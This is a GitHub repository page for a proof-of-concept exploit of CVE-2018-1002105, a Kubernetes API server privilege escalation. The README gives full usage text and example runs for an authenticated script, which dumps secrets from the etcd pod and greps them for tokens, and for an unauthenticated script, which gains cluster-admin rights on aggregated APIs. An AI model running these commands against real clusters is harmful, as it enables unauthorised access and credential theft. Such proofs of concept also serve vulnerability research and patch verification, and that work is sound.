PoC for CVE-2018-1002105.
Switch branches/tags
Nothing to show
Clone or download
Latest commit 8e2ebb4 Dec 10, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE Initial commit Dec 6, 2018
README.md 📝 Updated docs Dec 10, 2018
poc.py 🐛 Format updates Dec 9, 2018
stage_1 Added portforward and attach methods Dec 9, 2018
stage_2 🐛 Bug fix Dec 7, 2018
unauth_poc.py Use cluster-admin by default Dec 10, 2018
ustage_1 🎉 Initial commit for unauthenticated part Dec 9, 2018
ustage_2 Use cluster-admin by default Dec 10, 2018

README.md

CVE-2018-1002105 PoC

Authenticated PoC

Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires create and get privileges on pods and pods/exec. Support has been added for portforward and attach, which require similar permissions.

The current PoC dumps the secrets from the default etcd-kubernetes pod.

Demo

The PoC in action:

asciicast

Usage

usage: poc.py [-h] --target TARGET --jwt TOKEN [--namespace NAMESPACE] --pod
              POD --method {exec,portforward,attach}
              [--privileged-namespace PNAMESPACE] [--privileged-pod PPOD]
              [--container CONTAINER] [--command COMMAND]
              [--filename FILENAME]

PoC for CVE-2018-1002105.

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  --target TARGET, -t TARGET
                        API server target:port
  --jwt TOKEN, -j TOKEN
                        JWT token for service account
  --namespace NAMESPACE, -n NAMESPACE
                        Namespace with method access
  --pod POD, -p POD     Pod with method access
  --method {exec,portforward,attach}, -m {exec,portforward,attach}

optional arguments:
  --privileged-namespace PNAMESPACE, -s PNAMESPACE
                        Target namespace
  --privileged-pod PPOD, -e PPOD
                        Target privileged pod
  --container CONTAINER, -c CONTAINER
                        Target container
  --command COMMAND, -x COMMAND
                        Command to execute
  --filename FILENAME, -f FILENAME
                        File to save output to

Example:

$ ./poc.py -t 10.0.2.15:6443 --jwt [token] -p [pod] -f etcd.out -m attach
[*] Building pipe using attach...
[+] Pipe opened :D
[*] Attempting code exec on etcd-kubernetes/etcd
[*] Writing output to etcd.out ....
[+] Done!

Check for tokens:

$ grep -air eyJ etcd.db

Unauthenticated PoC

The unauthenticated PoC allows privilege escalation within the context of the exposed API. Depending on the functionalities of the API it might be possible to get code execution on pods. This demo currently exploits the bug to gain cluster-admin rights on the servicecatalog.k8s.io API. This exploit should also work for metrics.k8s.io or any API exposed through the aggregated layer.

Demo

The PoC in action:

asciicast

Usage

usage: unauth_poc.py [-h] --target TARGET [--api-base BASE]
                     [--api-target TARGET_API] [--api-version VERSION]
                     [--json] [--filename FILENAME]

Unauthenticated PoC for CVE-2018-1002105

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  --target TARGET, -t TARGET
                        API server target:port
  --api-base BASE, -b BASE
                        Target API name i.e. "servicecatalog.k8s.io"
  --api-target TARGET_API, -u TARGET_API
                        API to access i.e. "clusterservicebrokers"

optional arguments:
  --api-version VERSION, -a VERSION
                        API version to use i.e. "v1beta1"
  --json, -j            Print json output
  --filename FILENAME, -f FILENAME
                        File to save output to

Example:

$ ./unauth_poc.py -t 10.0.2.15:6443 --json -f api.out
[*] Building pipe ...
[+] Pipe opened :D
[*] Attempting to access url
[+] Pipe opened :D
[*] Writing output to api.out ....
[+] Done!